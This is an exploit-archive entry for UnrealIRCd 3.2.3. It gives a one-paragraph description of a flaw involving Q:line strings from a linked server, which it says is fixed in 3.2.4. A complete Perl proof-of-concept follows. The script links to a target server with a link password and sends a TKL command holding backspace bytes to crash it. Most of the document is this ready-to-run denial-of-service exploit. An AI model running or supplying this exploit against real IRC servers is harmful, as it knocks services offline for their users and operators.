UnrealIRCd3.2.3.pl.txt

`-Description-  
UnrealIRCd 3.2.3 is vulnerable to strings sent from a linked server for adding/removing Q:lines with special characters. Could be sent through services.  
Fixed as of version 3.2.4  
  
-PoC-  
#!/usr/bin/perl  
  
# Denial of Service exploit for UnrealIRCd 3.2.3  
# Successfully tested on both Win32 and Linux versions.  
# [email protected] (Brandon Milner)  
  
use IO::Socket;  
print ("UnrealIRCd Server-Link Denial of Service exploit PoC by Redneck\n");  
  
#################  
# Variables #  
#################  
$spass = ("LinkPass"); # Link Password  
$lserver = ("your.server.name"); # Local Server name  
$rserver = ("remote.server.name"); # Link Server  
$rport = (6667); # Link Port  
$snum = (6); # Server numeric  
  
#################  
# Create socket #  
#################  
my $sock = new IO::Socket::INET (  
PeerAddr => $rserver,  
PeerPort => $rport,  
Proto => 'tcp',  
);  
  
#################  
# Connect #  
#################  
die "Couldn't create socket to $rserver / $rport!\n" unless $sock;  
sleep 5;  
print ("connected to server");  
print $sock ("PASS $spass\n");  
print ("PASS $spass\n");  
print $sock ("SERVER $lserver 1 $snum :PoC by Redneck\n");  
print ("SERVER $lserver 1 $snum :PoC by Redneck\n");  
sleep 5;  
print $sock ("TKL - q\x08Q *\x08PoC\n");  
print ("TKL - q\x08Q *\x08PoC\n");  
sleep 5;  
`